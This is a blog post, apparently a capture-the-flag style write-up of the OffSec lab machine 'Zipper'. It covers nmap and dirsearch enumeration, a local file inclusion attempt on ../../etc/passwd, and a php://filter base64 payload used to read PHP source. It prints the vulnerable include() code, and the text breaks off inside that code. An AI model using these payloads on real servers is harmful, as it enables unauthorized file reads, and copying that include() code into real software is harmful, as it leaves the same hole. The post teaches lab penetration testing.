{"id":356,"date":"2024-06-21T18:26:45","date_gmt":"2024-06-21T18:26:45","guid":{"rendered":"https:\/\/bencron.com\/?p=356"},"modified":"2024-06-25T18:54:20","modified_gmt":"2024-06-25T18:54:20","slug":"zipper-offsec-proving-grounds-practice-hard","status":"publish","type":"post","link":"https:\/\/bencron.com\/?p=356","title":{"rendered":"Zipper &#8211; OffSec Proving Grounds (Practice)"},"content":{"rendered":"\n<h2 class=\"wp-block-heading has-text-align-center\">The Summary<\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Platform Site<\/strong><\/td><td>OffSec Proving Grounds (Practice)<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Hostname<\/strong><\/td><td>zipper<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Domain<\/strong><\/td><td>zipper.offsec<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Operating System \/ Architecture<\/strong><\/td><td>Linux<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Rating<\/strong><\/td><td>Hard<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>This write-up is for the machine Zipper on the OffSec Proving Grounds (Practice) labs. 
I will cover PHP wrappers and take the machine all the way through Privilege Escalation.<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">The Attack<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Scanning &amp; Prelims<\/h3>\n\n\n\n<p>NMAP Command<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -T4 -A -p- xx.xx.xx.xx -oA nmap-XXXXXX --webxml<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>nmap<\/code> &#8211;&gt; the application<\/li>\n\n\n\n<li><code>-T4<\/code> &#8211;&gt; timing set to aggressive (4)<\/li>\n\n\n\n<li><code>-A -p-<\/code> &#8211;&gt; enables OS detection, version detection, default scripts and traceroute, and scans all 65535 ports<\/li>\n\n\n\n<li><code>xx.xx.xx.xx<\/code> &#8211;&gt; target IP address<\/li>\n\n\n\n<li><code>-oA<\/code> &#8211;&gt; output All file types: normal, grepable, XML<\/li>\n\n\n\n<li><code>nmap-XXXXXX<\/code> &#8211;&gt; names of output files (XXXX changes per tester&#8217;s choice)<\/li>\n\n\n\n<li><code>--webxml<\/code> &#8211;&gt; can move &amp; view the XML easily on another machine<\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;--cbp-line-number-width:calc(2 * 0.6 * .875rem);line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#2e2e2e;color:#d5ffff\">NMAP &#8211; Output<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Host is up (0.095s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)\n|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)\n|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)\n80\/tcp open  
http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Zipper\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.93%E=4%D=5\/22%OT=22%CT=1%CU=39495%PV=Y%DS=4%DC=T%G=Y%TM=664E04A\nOS:B%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%II=I%TS=A)SEQ(SP=1\nOS:01%GCD=1%ISR=10E%TI=Z%TS=A)OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT1\nOS:1NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE\nOS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=\nOS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y\nOS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=16\nOS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=893B%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 4 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">Host is up (0.095s latency).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Not shown: 65533 closed tcp ports (reset)<\/span><\/span>\n<span class=\"line\"><span 
style=\"color: #EEFFFF\">PORT   STATE SERVICE VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">| ssh-hostkey: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-title: Zipper<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-server-header: Apache\/2.4.41 (Ubuntu)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">No exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">TCP\/IP fingerprint:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:SCAN(V=7.93%E=4%D=5\/22%OT=22%CT=1%CU=39495%PV=Y%DS=4%DC=T%G=Y%TM=664E04A<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%II=I%TS=A)SEQ(SP=1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:01%GCD=1%ISR=10E%TI=Z%TS=A)OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:1NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #EEFFFF\">OS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=893B%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Network Distance: 4 hops<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>While scanning I set up notes for this machine. I also edit the <code>\/etc\/hosts<\/code> file in Kali to associate a domain of my choosing to the IP address provided by the Platform Site. The entry is often added to during testing when new domains are found.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Service Enumeration<\/h3>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#2e2e2e;color:#d5ffff\">SSH<\/span><span role=\"button\" tabindex=\"0\" data-code=\"22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)\n|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)\n|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" 
fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">| ssh-hostkey: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>&#8220;It&#8217;s never SSH.&#8221; One day the problem will be SSH, but not today.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#2e2e2e;color:#d5ffff\">HTTP<\/span><span role=\"button\" tabindex=\"0\" data-code=\"80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Zipper\n|_http-server-header: 
Apache\/2.4.41 (Ubuntu)\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-title: Zipper<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-server-header: Apache\/2.4.41 (Ubuntu)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>HTTP is always a good jumping off point. 
Let&#8217;s browse to the site and also check Wappalyzer.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"931\" height=\"574\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69.png\" alt=\"\" class=\"wp-image-360\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69.png 931w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69-300x185.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69-768x474.png 768w\" sizes=\"auto, (max-width: 931px) 100vw, 931px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"407\" height=\"479\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-72.png\" alt=\"\" class=\"wp-image-363\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-72.png 407w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-72-255x300.png 255w\" sizes=\"auto, (max-width: 407px) 100vw, 407px\" \/><\/figure>\n\n\n\n<p>At this point it is a good idea to run a directory search using one of the many tools available. I like <code>dirsearch<\/code> at the moment, but preferences vary and change with time. Wappalyzer also shows that PHP is in use. So, I will look for directories along with <code>.php<\/code> files and some other file extensions to cover my bases. 
The <code>dirsearch<\/code> output file is below.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"# Dirsearch started Wed May 22 10:47:47 2024 as: dirsearch.py -u http:\/\/zipper.offsec -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -f -e php,txt,bak -o \/root\/OffSec_Proving_Grounds\/Zipper\/dirsearch_output_Zipper.txt\n\n200     3KB  http:\/\/zipper.offsec:80\/index.php\n200     3KB  http:\/\/zipper.offsec:80\/home.php\n403   278B   http:\/\/zipper.offsec:80\/icons\/\n403   278B   http:\/\/zipper.offsec:80\/uploads\/\n301   316B   http:\/\/zipper.offsec:80\/uploads    -&gt; REDIRECTS TO: http:\/\/zipper.offsec\/uploads\/\n200     0B   http:\/\/zipper.offsec:80\/upload.php\n200   155B   http:\/\/zipper.offsec:80\/style\n403   278B   http:\/\/zipper.offsec:80\/server-status\/\n403   278B   http:\/\/zipper.offsec:80\/server-status\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" 
tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #545454; font-style: italic\"># Dirsearch started Wed May 22 10:47:47 2024 as: dirsearch.py -u http:\/\/zipper.offsec -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -f -e php,txt,bak -o \/root\/OffSec_Proving_Grounds\/Zipper\/dirsearch_output_Zipper.txt<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200     3KB  http:\/\/zipper.offsec:80\/index.php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200     3KB  http:\/\/zipper.offsec:80\/home.php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/icons\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/uploads\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">301   316B   http:\/\/zipper.offsec:80\/uploads    -&gt; REDIRECTS TO: http:\/\/zipper.offsec\/uploads\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200     0B   http:\/\/zipper.offsec:80\/upload.php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200   155B   http:\/\/zipper.offsec:80\/style<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/server-status\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/server-status<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Clicking the &#8220;Home&#8221; button on the site brings up something interesting in the address bar. 
Seeing a <code>file=<\/code> parameter is a good indicator of potential directory traversal or LFI (Local File Inclusion).<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"467\" height=\"162\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-71.png\" alt=\"\" class=\"wp-image-362\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-71.png 467w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-71-300x104.png 300w\" sizes=\"auto, (max-width: 467px) 100vw, 467px\" \/><\/figure>\n\n\n\n<p>I found the <a href=\"https:\/\/owasp.org\/www-project-web-security-testing-guide\/v42\/4-Web_Application_Security_Testing\/07-Input_Validation_Testing\/11.1-Testing_for_Local_File_Inclusion\" target=\"_blank\" rel=\"noopener\" title=\"\">OWASP WSTG<\/a> (Web Security Testing Guide) to be helpful here. I checked for the standard <code>..\/..\/etc\/passwd<\/code> and tried to view the <code>upload.php<\/code> file that was revealed in our dirsearch output.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"531\" height=\"156\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-73.png\" alt=\"\" class=\"wp-image-364\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-73.png 531w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-73-300x88.png 300w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"524\" height=\"157\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-76.png\" alt=\"\" class=\"wp-image-367\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-76.png 524w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-76-300x90.png 300w\" sizes=\"auto, (max-width: 524px) 100vw, 524px\" \/><\/figure>\n\n\n\n<p>However, 
exploring the OWASP site a bit more brings us to a section on <code>PHP wrappers<\/code>. These can allow an attacker to upgrade an LFI to Remote Code Execution (RCE) or other possibilities. A wrapper is a bit of code that surrounds (&#8220;wraps&#8221;) other code to give some added functionality. PHP has several <a href=\"https:\/\/www.php.net\/manual\/en\/wrappers.php\" target=\"_blank\" rel=\"noopener\" title=\"\">built-in wrappers<\/a> and an example is given. The following wrapper reads a file, encodes it in Base64 and prints the encoded text to the browser screen; because the output is Base64 rather than PHP, the file is returned instead of being executed, so PHP source can be read. It should be placed after the equal (=) sign in the URL.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"php:\/\/filter\/convert.base64-encode\/resource=FILENAME\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: 
#EEFFFF\">php:\/\/filter\/convert.base64-encode\/resource=FILENAME<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"623\" height=\"121\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-77.png\" alt=\"\" class=\"wp-image-368\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-77.png 623w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-77-300x58.png 300w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/figure>\n\n\n\n<p>Decoding the Base64 string (I use Cyberchef) reveals the file contents.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"&lt;?php\n$file = $_GET['file'];\nif(isset($file))\n{\n    include(&quot;$file&quot;.&quot;.php&quot;);\n}\nelse\n{\ninclude(&quot;home.php&quot;);\n}\n?&gt;\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span 
class=\"line\"><span style=\"color: #89DDFF\">&lt;?<\/span><span style=\"color: #EEFFFF\">php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">$<\/span><span style=\"color: #EEFFFF\">file <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #89DDFF\">$<\/span><span style=\"color: #EEFFFF\">_GET<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">file<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">];<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #82AAFF\">isset<\/span><span style=\"color: #89DDFF\">($<\/span><span style=\"color: #EEFFFF\">file<\/span><span style=\"color: #89DDFF\">))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">    <\/span><span style=\"color: #89DDFF; font-style: italic\">include<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;$<\/span><span style=\"color: #EEFFFF\">file<\/span><span style=\"color: #89DDFF\">&quot;.&quot;<\/span><span style=\"color: #C3E88D\">.php<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">else<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">include<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">home.php<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span 
